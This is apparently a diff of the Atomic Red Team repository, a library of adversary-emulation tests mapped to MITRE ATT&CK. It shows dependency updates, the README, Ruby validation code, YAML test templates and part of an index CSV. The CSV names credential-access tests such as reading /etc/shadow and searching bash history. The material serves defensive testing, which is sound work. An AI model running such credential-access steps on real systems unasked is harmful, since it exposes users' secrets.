jekyll-relative-links (= 0.5.3)
jekyll-remote-theme (= 0.3.1)
jekyll-sass-converter (= 1.5.2)
jekyll-seo-tag (= 2.6.1)
jekyll-sitemap (= 1.4.0)
jekyll-swiss (= 1.0.0)
jekyll-seo-tag (= 2.5.0)
jekyll-sitemap (= 1.2.0)
jekyll-swiss (= 0.4.0)
jekyll-theme-architect (= 0.1.1)
jekyll-theme-cayman (= 0.1.1)
jekyll-theme-dinky (= 0.1.1)
jekyll-theme-hacker (= 0.1.2)
jekyll-theme-hacker (= 0.1.1)
jekyll-theme-leap-day (= 0.1.1)
jekyll-theme-merlot (= 0.1.1)
jekyll-theme-midnight (= 0.1.1)
jekyll-theme-minimal (= 0.1.1)
jekyll-theme-modernist (= 0.1.1)
jekyll-theme-primer (= 0.5.4)
jekyll-theme-primer (= 0.5.3)
jekyll-theme-slate (= 0.1.1)
jekyll-theme-tactile (= 0.1.1)
jekyll-theme-time-machine (= 0.1.1)
jekyll-titles-from-headings (= 0.5.3)
jemoji (= 0.12.0)
kramdown (= 2.3.0)
kramdown-parser-gfm (= 1.1.0)
liquid (= 4.0.3)
jekyll-titles-from-headings (= 0.5.1)
jemoji (= 0.10.1)
kramdown (= 1.17.0)
liquid (= 4.0.0)
listen (= 3.1.5)
mercenary (~> 0.3)
minima (= 2.5.1)
nokogiri (>= 1.10.4, < 2.0)
rouge (= 3.23.0)
minima (= 2.5.0)
nokogiri (>= 1.8.2, < 2.0)
rouge (= 2.2.1)
terminal-table (~> 1.4)
github-pages-health-check (1.16.1)
github-pages-health-check (1.8.1)
addressable (~> 2.3)
dnsruby (~> 1.60)
octokit (~> 4.0)
public_suffix (~> 3.0)
public_suffix (~> 2.0)
typhoeus (~> 1.3)
html-pipeline (2.14.0)
html-pipeline (2.10.0)
activesupport (>= 2)
nokogiri (>= 1.4)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jekyll (3.9.0)
jekyll (3.7.4)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
i18n (~> 0.7)
jekyll-sass-converter (~> 1.0)
jekyll-watch (~> 2.0)
kramdown (>= 1.17, < 3)
kramdown (~> 1.14)
liquid (~> 4.0)
mercenary (~> 0.3.3)
pathutil (~> 0.9)
rouge (>= 1.7, < 4)
safe_yaml (~> 1.0)
jekyll-avatar (0.7.0)
jekyll (>= 3.0, < 5.0)
jekyll-avatar (0.6.0)
jekyll (~> 3.0)
jekyll-coffeescript (1.1.1)
coffee-script (~> 2.2)
coffee-script-source (~> 1.11.1)
jekyll-commonmark (1.3.1)
jekyll-commonmark (1.2.0)
commonmarker (~> 0.14)
jekyll (>= 3.7, < 5.0)
jekyll-commonmark-ghpages (0.1.6)
jekyll (>= 3.0, < 4.0)
jekyll-commonmark-ghpages (0.1.5)
commonmarker (~> 0.17.6)
jekyll-commonmark (~> 1.2)
rouge (>= 2.0, < 4.0)
jekyll-commonmark (~> 1)
rouge (~> 2)
jekyll-default-layout (0.1.4)
jekyll (~> 3.0)
jekyll-feed (0.15.1)
jekyll (>= 3.7, < 5.0)
jekyll-feed (0.11.0)
jekyll (~> 3.3)
jekyll-gist (1.5.0)
octokit (~> 4.2)
jekyll-github-metadata (2.13.0)
jekyll (>= 3.4, < 5.0)
jekyll-github-metadata (2.9.4)
jekyll (~> 3.1)
octokit (~> 4.0, != 4.4.0)
jekyll-mentions (1.6.0)
jekyll-mentions (1.4.1)
html-pipeline (~> 2.3)
jekyll (>= 3.7, < 5.0)
jekyll-optional-front-matter (0.3.2)
jekyll (>= 3.0, < 5.0)
jekyll (~> 3.0)
jekyll-optional-front-matter (0.3.0)
jekyll (~> 3.0)
jekyll-paginate (1.1.0)
jekyll-readme-index (0.3.0)
jekyll (>= 3.0, < 5.0)
jekyll-redirect-from (0.16.0)
jekyll (>= 3.3, < 5.0)
jekyll-relative-links (0.6.1)
jekyll (>= 3.3, < 5.0)
jekyll-remote-theme (0.4.2)
addressable (~> 2.0)
jekyll (>= 3.5, < 5.0)
jekyll-sass-converter (>= 1.0, <= 3.0.0, != 2.0.0)
rubyzip (>= 1.3.0, < 3.0)
jekyll-readme-index (0.2.0)
jekyll (~> 3.0)
jekyll-redirect-from (0.14.0)
jekyll (~> 3.3)
jekyll-relative-links (0.5.3)
jekyll (~> 3.3)
jekyll-remote-theme (0.3.1)
jekyll (~> 3.5)
rubyzip (>= 1.2.1, < 3.0)
jekyll-sass-converter (1.5.2)
sass (~> 3.4)
jekyll-seo-tag (2.6.1)
jekyll (>= 3.3, < 5.0)
jekyll-sitemap (1.4.0)
jekyll (>= 3.7, < 5.0)
jekyll-swiss (1.0.0)
jekyll-seo-tag (2.5.0)
jekyll (~> 3.3)
jekyll-sitemap (1.2.0)
jekyll (~> 3.3)
jekyll-swiss (0.4.0)
jekyll-theme-architect (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
@@ -160,8 +157,8 @@ GEM
jekyll-theme-dinky (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-hacker (0.1.2)
jekyll (> 3.5, < 5.0)
jekyll-theme-hacker (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-leap-day (0.1.1)
jekyll (~> 3.5)
@@ -178,8 +175,8 @@ GEM
jekyll-theme-modernist (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-primer (0.5.4)
jekyll (> 3.5, < 5.0)
jekyll-theme-primer (0.5.3)
jekyll (~> 3.5)
jekyll-github-metadata (~> 2.9)
jekyll-seo-tag (~> 2.0)
jekyll-theme-slate (0.1.1)
@@ -191,72 +188,60 @@ GEM
jekyll-theme-time-machine (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-titles-from-headings (0.5.3)
jekyll (>= 3.3, < 5.0)
jekyll-watch (2.2.1)
jekyll-titles-from-headings (0.5.1)
jekyll (~> 3.3)
jekyll-watch (2.1.2)
listen (~> 3.0)
jemoji (0.12.0)
jemoji (0.10.1)
gemoji (~> 3.0)
html-pipeline (~> 2.2)
jekyll (>= 3.0, < 5.0)
kramdown (2.3.0)
rexml
kramdown-parser-gfm (1.1.0)
kramdown (~> 2.0)
liquid (4.0.3)
listen (3.3.0)
rb-fsevent (~> 0.10, >= 0.10.3)
rb-inotify (~> 0.9, >= 0.9.10)
jekyll (~> 3.0)
kramdown (1.17.0)
liquid (4.0.0)
listen (3.1.5)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
ruby_dep (~> 1.2)
mercenary (0.3.6)
mini_portile2 (2.5.1)
minima (2.5.1)
jekyll (>= 3.5, < 5.0)
mini_portile2 (2.4.0)
minima (2.5.0)
jekyll (~> 3.5)
jekyll-feed (~> 0.9)
jekyll-seo-tag (~> 2.1)
minitest (5.14.2)
multipart-post (2.1.1)
nokogiri (1.11.4)
mini_portile2 (~> 2.5.0)
racc (~> 1.4)
octokit (4.19.0)
faraday (>= 0.9)
minitest (5.11.3)
multipart-post (2.0.0)
nokogiri (1.10.1)
mini_portile2 (~> 2.4.0)
octokit (4.13.0)
sawyer (~> 0.8.0, >= 0.5.3)
pathutil (0.16.2)
forwardable-extended (~> 2.6)
public_suffix (3.1.1)
racc (1.5.2)
rb-fsevent (0.10.4)
rb-inotify (0.10.1)
public_suffix (2.0.5)
rb-fsevent (0.10.3)
rb-inotify (0.10.0)
ffi (~> 1.0)
rexml (3.2.5)
rouge (3.23.0)
ruby-enum (0.8.0)
rouge (2.2.1)
ruby-enum (0.7.2)
i18n
ruby2_keywords (0.0.2)
rubyzip (2.3.0)
safe_yaml (1.0.5)
sass (3.7.4)
ruby_dep (1.5.0)
rubyzip (1.2.2)
safe_yaml (1.0.4)
sass (3.7.3)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
sawyer (0.8.2)
addressable (>= 2.3.5)
faraday (> 0.8, < 2.0)
simpleidn (0.1.1)
unf (~> 0.1.4)
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
terminal-table (1.8.0)
unicode-display_width (~> 1.1, >= 1.1.1)
thread_safe (0.3.6)
typhoeus (1.4.0)
typhoeus (1.3.1)
ethon (>= 0.9.0)
tzinfo (1.2.8)
tzinfo (1.2.5)
thread_safe (~> 0.1)
unf (0.1.4)
unf_ext
unf_ext (0.0.7.7)
unicode-display_width (1.7.0)
zeitwerk (2.4.1)
unicode-display_width (1.4.1)
PLATFORMS
ruby
@@ -266,4 +251,4 @@ DEPENDENCIES
github-pages
BUNDLED WITH
1.17.3
1.16.1
README.md
+47 -25
View File
@@ -1,39 +1,61 @@
<p><img src="https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" width="150px" /></p>
# Atomic Red Team
[![CircleCI](https://circleci.com/gh/redcanaryco/atomic-red-team.svg?style=svg)](https://circleci.com/gh/redcanaryco/atomic-red-team)
Atomic Red Team is library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
Atomic Red Team to quickly, portably, and reproducibly test their environments.
Atomic Red Team allows every security team to test their controls by executing simple
"atomic tests" that exercise the same techniques used by adversaries (all mapped to
[Mitre's ATT&CK](https://attack.mitre.org/wiki/Main_Page)).
## Get started
## Philosophy
You can execute atomic tests directly from the command line, no installation
required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started)
page of our wiki.
Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are
focused, have few dependencies, and are defined in a structured format that be used by automation frameworks.
For a more robust testing experience, consider using an execution framework like
[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam).
Three key beliefs made up the Atomic Red Team charter:
- **Teams need to be able to test everything from specific technical controls to outcomes.**
Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know
what our controls and program can detect, and what it cannot. We dont have to detect every adversary, but we
do believe in knowing our blind spots.
## Learn more
- **We should be able to run a test in less than five minutes.**
Most security tests and automation tools take a tremendous amount of time to install, configure, and execute.
We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be
run in a few minutes.
The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/).
The best test is the one you actually run.
For information about the philosophy and development of Atomic Red Team, visit
our website at <https://atomicredteam.io>.
- **We need to keep learning how adversaries are operating.**
Most security teams dont have the benefit of seeing a wide variety of adversary types and techniques crossing
their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used,
which makes the community working together essential to making us all better.
## Contribute to Atomic Red Team
See: https://atomicredteam.io
Atomic Red Team is open source and community developed. If you're interested in
becoming a contributor, check out these resources:
## Having trouble?
- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved
with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
before you join.
- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
for more information about contributing directly to this repository.
- Check the [license](LICENSE.txt) for information regarding the distribution
and modification of Atomic Red Team.
Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
## Getting Started
* [Getting Started With Atomic Tests](https://atomicredteam.io/testing)
* Peruse the [Complete list of Atomic Tests](atomics/index.md) and the [ATT&CK Matrix](atomics/matrix.md)
- Windows [Tests](atomics/windows-index.md) and [Matrix](atomics/windows-matrix.md)
- macOS [Tests](atomics/macos-index.md) and [Matrix](atomics/macos-matrix.md)
- Linux [Tests](atomics/linux-index.md) and [Matrix](atomics/linux-matrix.md)
* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://atomicredteam.io/contributing) your own modifications
* [Doing more with Atomic Red Team](#doing-more-with-atomic-red-team)
* [Using the Atomic Red Team Ruby API](#using-the-atomic-red-team-ruby-api)
* [Bonus APIs: Ruby ATT&CK API](#bonus-apis-ruby-attck-api)
* [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
* Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)
## Code of Conduct
In order to have a more open and welcoming community, Atomic Red Team adheres to a
[code of conduct](CODE_OF_CONDUCT.md).
## License
See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file.
atomic_red_team/atomic_doc_template.md.erb
+12 -58
View File
@@ -1,6 +1,6 @@
# <%= technique['identifier'] %> - <%= technique['name'] -%>
## [Description from ATT&CK](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/<%= technique['identifier'] %>)
<blockquote><%= technique['description'] %></blockquote>
## Atomic Tests
@@ -13,83 +13,37 @@
<br/>
## Atomic Test #<%= test_number+1 %> - <%= test['name'] %>
<%= test['description'].strip -%>
<%= test['description'] -%>
**Supported Platforms:** <%= test['supported_platforms'].collect do |p|
case p
when 'macos'
'macOS'
when 'centos'
'CentOS'
else
p.capitalize
end
end.join(', ') %>
**auto_generated_guid:** <%= test['auto_generated_guid'] %>
<%def cleanup(input)
input.to_s.strip.gsub(/\\/,"&#92;")
end%>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs:
| Name | Description | Type | Default Value |
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>|
| <%= arg_name %> | <%= arg_options['description'] %> | <%= arg_options['type'] %> | <%= arg_options['default'] %>|
<% end -%>
<% end -%>
<%- if test['executor']['name'] == 'manual' -%>
#### Run it with these steps! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
#### Run it with these steps!
<%= test['executor']['steps'] %>
<%- else -%>
#### Attack Commands: Run with `<%= test['executor']['name'] %>`! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
<%def get_language(executor)
language = executor
if executor == "command_prompt"
language = "cmd"
elsif executor == "manual"
language = ""
end
language
end%>
```<%= get_language(test['executor']['name']) %>
#### Run it with `<%= test['executor']['name'] %>`!
```
<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
<%- if test['executor']['cleanup_command'] != nil -%>
#### Cleanup Commands:
```<%= get_language(test['executor']['name']) %>
<%= test['executor']['cleanup_command'].to_s.strip %>
```
<%- end -%>
<% if test['dependencies'].to_a.count > 0 %>
<% dependency_executor = test['executor']['name'] %>
#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><% dependency_executor = test['dependency_executor_name'] %><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
<% test['dependencies'].each do | dep | -%>
##### Description: <%= dep['description'].strip %>
##### Check Prereq Commands:
```<%= get_language(dependency_executor) %>
<%= dep['prereq_command'].strip %>
```
##### Get Prereq Commands:
```<%= get_language(dependency_executor) %>
<%= dep['get_prereq_command'].strip %>
```
<% end -%>
<% end -%>
<br/>
<%- end -%>
<%- end -%>
atomic_red_team/atomic_red_team.rb
+12 -87
View File
@@ -1,7 +1,6 @@
require 'yaml'
require 'erb'
require 'attack_api'
require 'securerandom'
class AtomicRedTeam
ATTACK_API = Attack.new
@@ -47,42 +46,26 @@ class AtomicRedTeam
#
# Returns a Markdown formatted Github link to a technique. This will be to the edit page for
# techniques that already have one or more Atomic Red Team tests, or the create page for
# techniques that have no existing tests for the given OS.
# techniques that have no existing tests.
#
def github_link_to_technique(technique, include_identifier: false, only_platform: self.only_platform)
def github_link_to_technique(technique, include_identifier: false, link_new_to_contrib: true)
technique_identifier = ATTACK_API.technique_identifier_for_technique(technique).upcase
link_display = "#{"#{technique_identifier.upcase} " if include_identifier}#{technique['name']}"
yaml_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.yaml"
markdown_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
if atomic_yaml_has_test_for_platform(yaml_file, only_platform) && (File.exists? markdown_file)
if File.exists? "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
# we have a file for this technique, so link to it's Markdown file
"[#{link_display}](../../#{technique_identifier}/#{technique_identifier}.md)"
"[#{link_display}](./#{technique_identifier}/#{technique_identifier}.md)"
else
# we don't have a file for this technique, or there are not tests for the given platform, so link to an edit page
# we don't have a file for this technique, so link to an edit page
"#{link_display} [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)"
end
end
def atomic_yaml_has_test_for_platform(yaml_file, only_platform)
has_test_for_platform = false
if File.exists? yaml_file
yaml = YAML.load_file(yaml_file)
yaml['atomic_tests'].each_with_index do |atomic, i|
if atomic["supported_platforms"].any? {|platform| platform.downcase =~ only_platform}
has_test_for_platform = true
break
end
end
end
return has_test_for_platform
end
def validate_atomic_yaml!(yaml, used_guids_file, unique_guid_array)
def validate_atomic_yaml!(yaml)
raise("YAML file has no elements") if yaml.nil?
raise('`attack_technique` element is required') unless yaml.has_key?('attack_technique')
raise('`attack_technique` element must be a string') unless yaml['attack_technique'].is_a?(String)
raise('`attack_technique` element must be an array') unless yaml['attack_technique'].is_a?(String)
raise('`display_name` element is required') unless yaml.has_key?('display_name')
raise('`display_name` element must be an array') unless yaml['display_name'].is_a?(String)
@@ -94,34 +77,20 @@ class AtomicRedTeam
yaml['atomic_tests'].each_with_index do |atomic, i|
raise("`atomic_tests[#{i}].name` element is required") unless atomic.has_key?('name')
raise("`atomic_tests[#{i}].name` element must be a string") unless atomic['name'].is_a?(String)
if atomic.has_key?('auto_generated_guid')
guid = atomic["auto_generated_guid"].to_s
raise("`atomic_tests[#{i}].auto_generated_guid` element not a proper guid") unless /[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}/.match(guid)
raise("`atomic_tests[#{i}].auto_generated_guid` element must be unique") unless !unique_guid_array.include?(guid)
unique_guid_array << guid
end
raise("`atomic_tests[#{i}].description` element is required") unless atomic.has_key?('description')
raise("`atomic_tests[#{i}].description` element must be a string") unless atomic['description'].is_a?(String)
raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
valid_supported_platforms = ['windows', 'macos', 'linux', 'office-365', 'azure-ad', 'google-workspace', 'saas', 'iaas', 'containers', 'iaas:aws', 'iaas:azure', 'iaas:gcp']
valid_supported_platforms = ['windows', 'centos', 'ubuntu', 'macos', 'linux']
atomic['supported_platforms'].each do |platform|
if !valid_supported_platforms.include?(platform)
raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
end
end
if atomic['dependencies']
atomic['dependencies'].each do |dependency|
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a description}") unless dependency.has_key?('description')
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a prereq_command}") unless dependency.has_key?('prereq_command')
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a get_prereq_command}") unless dependency.has_key?('get_prereq_command')
end
end
(atomic['input_arguments'] || {}).each_with_index do |arg_kvp, iai|
arg_name, arg = arg_kvp
raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element is required") unless arg.has_key?('description')
@@ -142,7 +111,7 @@ class AtomicRedTeam
raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual']
case executor['name']
when 'manual'
raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
@@ -152,7 +121,7 @@ class AtomicRedTeam
string: executor['steps'],
string_description: "atomic_tests[#{i}].executor.steps"
when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
when 'command_prompt', 'sh', 'bash', 'powershell'
raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
@@ -167,50 +136,6 @@ class AtomicRedTeam
end
end
def record_used_guids!(yaml, used_guids_file)
return unless !yaml.nil?
yaml['atomic_tests'].each_with_index do |atomic, i|
next unless atomic.has_key?('auto_generated_guid')
guid = atomic["auto_generated_guid"].to_s
add_guid_to_used_guid_file(guid, used_guids_file) unless guid == ''
end
end
def generate_guids_for_yaml!(path, used_guids_file)
text = File.read(path)
# add the "auto_generated_guid:" element after the "- name:" element if it isn't already there
text.gsub!(/(?i)(^([ \t]*-[ \t]*)name:.*$(?!\s*auto_generated_guid))/) { |m| "#{$1}\n#{$2.gsub(/-/," ")}auto_generated_guid:"}
# fill the "auto_generated_guid:" element in if it doesn't contain a guid
text.gsub!(/(?i)^([ \t]*auto_generated_guid:)(?!([ \t]*[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12})).*$/) { |m| "#{$1} #{get_unique_guid!(used_guids_file)}"}
File.open(path, "w") { |file| file << text }
end
# generates a unique guid and records the guid as having been used by writing it to the used_guids_file
def get_unique_guid!(used_guids_file)
new_guid = ''
20.times do |i| # if it takes more than 20 tries to get a unique guid, there must be something else going on
new_guid = SecureRandom.uuid
break unless !is_unique_guid(new_guid, used_guids_file)
end
# add this new unique guid to the used guids file
add_guid_to_used_guid_file(new_guid, used_guids_file)
return new_guid
end
# add guid to used guid file if it is the proper format and is not already in the file. raises an exception if guid isn't valid
def add_guid_to_used_guid_file(guid, used_guids_file)
open(used_guids_file, 'a') { |f|
raise("the GUID (#{guid}) does not match the required format for the `auto_generated_guid` element") unless /[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}/ =~ guid
f.puts guid unless !is_unique_guid(guid, used_guids_file)
}
end
def is_unique_guid(guid, used_guids_file)
return !File.foreach(used_guids_file).grep(/#{guid}/).any?
end
#
# Validates that the arguments (specified in "#{arg}" format) in a string
# match the input_arguments for a test
atomic_red_team/atomic_test_template.yaml
+4 -14
View File
@@ -10,27 +10,17 @@ atomic_tests:
supported_platforms:
- windows
- macos
- centos
- ubuntu
- linux
input_arguments:
output_file:
description: TODO
type: TODO
type: todo
default: TODO
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands.
dependencies: # (optional)
- description: |
TODO
prereq_command: | # Commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the prerequisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # Commands to meet this prerequisite or a message describing how to meet this prerequisite.
TODO
executor:
name: command_prompt
elevation_required: true # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false.
command: | # These are the actaul attack commands, at least one command must be provided.
TODO
cleanup_command: | # You can remove the cleanup_command section if there are no cleanup commands.
command: |
TODO
atomic_red_team/attack_api.rb
+4 -8
View File
@@ -22,7 +22,6 @@ class Attack
'collection',
'exfiltration',
'command-and-control',
'impact'
]
end
@@ -74,10 +73,9 @@ class Attack
def techniques_by_tactic(only_platform: /.*/)
techniques_by_tactic = Hash.new {|h, k| h[k] = []}
techniques.each do |technique|
next unless !technique['x_mitre_platforms'].nil?
next unless technique['x_mitre_platforms'].any? { |platform| platform.downcase =~ only_platform }
next unless technique['x_mitre_platforms'].any? {|platform| platform.downcase =~ only_platform}
technique.fetch('kill_chain_phases', []).select { |phase| phase['kill_chain_name'] == 'mitre-attack' }.each do |tactic|
technique.fetch('kill_chain_phases', []).select {|phase| phase['kill_chain_name'] == 'mitre-attack'}.each do |tactic|
techniques_by_tactic[tactic.fetch('phase_name')] << technique
end
end
@@ -88,10 +86,8 @@ class Attack
# Returns a list of all ATT&CK techniques
#
def techniques
return @techniques unless @techniques.nil?
# pull out the attack pattern objects
@techniques = attack_stix.fetch("objects").select do |item|
attack_stix.fetch("objects").select do |item|
item.fetch('type') == 'attack-pattern' && item.fetch('external_references', []).select do |references|
references['source_name'] == 'mitre-attack'
end
@@ -114,4 +110,4 @@ class Attack
end
end
end
end
end
atomic_red_team/enterprise-attack.json
+86264 -280173
View File
File diff suppressed because one or more lines are too long
atomic_red_team/spec.yaml
+9 -50
View File
@@ -13,16 +13,13 @@
# atomic_red_team/atomics
# atomic_red_team/atomics/T1234
# atomic_red_team/atomics/T1234/T1234.yaml <-- this is where all the atomic tests live
# atomic_red_team/atomics/T1234/src/payload1.sct <-- a payload file needed by one of the T1234 atomics (human readable)
# atomic_red_team/atomics/T1234/bin/payload2.dll <-- another payload file needed by one of the T1234 atomics (binary)
# atomic_red_team/atomics/T1234/payload1.sct <-- a payload file needed by one of the T1234 atomics
# atomic_red_team/atomics/T1234/payload2.dll <-- another payload file needed by one of the T1234 atomics
#
# In general, a set of atomic tests for a technique should never depend on payloads
# or supporting files from other atomic directories. We want to keep things nice and close.
# Use git symlinks if you really need to share files between techniques.
#
# Atomic tests should be fully automated whenever possible, requiring no continued interaction.
# Include any needed options to execute the commands seamlessly, for example SysInternal's -accepteula option or any -q or -quiet modes.
#
# To validate your atomics, run `bin/validate_atomics.rb`
---
attack_technique: TXXXX # (with a capital T, Example: 'T1123')
@@ -38,7 +35,6 @@ atomic_tests:
# This is the first atomic test
#
- name: Short name of the test that titles how it tests the technique. # Example: "SourceRecorder via cmd.exe"
auto_generated_guid: # This key and/or it's value will be added by the CI build after submitting a Pull Request
description: |
Long form description of the test. Markdown is supported so you can **bold** items, create
@@ -50,16 +46,9 @@ atomic_tests:
# supported platforms is an array of the OS/platforms this atomic test can be run upon. Values include:
# - windows
# - macos
# - centos
# - ubuntu
# - linux
# - office-365
# - azure-ad
# - google-workspace
# - saas
# - iaas
# - containers
# - iaas:gcp
# - iaas:azure
# - iaas:aws
supported_platforms:
- windows
@@ -87,35 +76,9 @@ atomic_tests:
type: Url
default: 0000:00:30
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
dependencies: # (optional)
# a list of dependies that must be met to successfully run this atomic
- description: |
TODO
prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
TODO
#example of two dependencies
dependencies:
- description: |
Sysmon executable must be available
prereq_command: |
where sysmon > nul
get_prereq_command: |
echo Automated installer not implemented yet, please install Sysmon manually
- description: |
Sysmon must be installed
prereq_command: |
sc query sysmon > nul
get_prereq_command: |
sysmon -i -accepteula
# a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
# a list of executors that can execute this atomic test. There are almost always going to be one of these
# per test, but there are cases where you may have multiple - for example, separate executors for `sh`
# and `bash` when working on linux OSes.
# Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, `gcloud` and `kubectl`.
executors:
# the name of the executor describes the framework or application in which the test should be executed.
#
@@ -162,7 +125,7 @@ atomic_tests:
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `manual` : a list of manual steps to run. This should only be used when required, for example when GUI steps are involved that
# - `manual` : a list of manual steps to run. This is most often used when GUI steps are involved that
# cannot be automated.
#
# Requires the `steps` option that tells the user what to do to invoke the test. This is a
@@ -180,24 +143,20 @@ atomic_tests:
# 3. Click the '#{FOOBAR}' button - you can interpolate here too!
#
- name: command_prompt
elevation_required: true
# indicates whether command must be run with admin privileges.
#If the elevation_required attribute is not defined, the value is assumed to be false
command: |
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
#
# This is the second atomic test
#
- name: Echo to the screen
description: |
blah blah blah
supported_platforms:
- macos
- linux
- centos
- ubuntu
# in this example we have no input arguments
input_arguments:
executors:
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
-892
View File
@@ -1,892 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
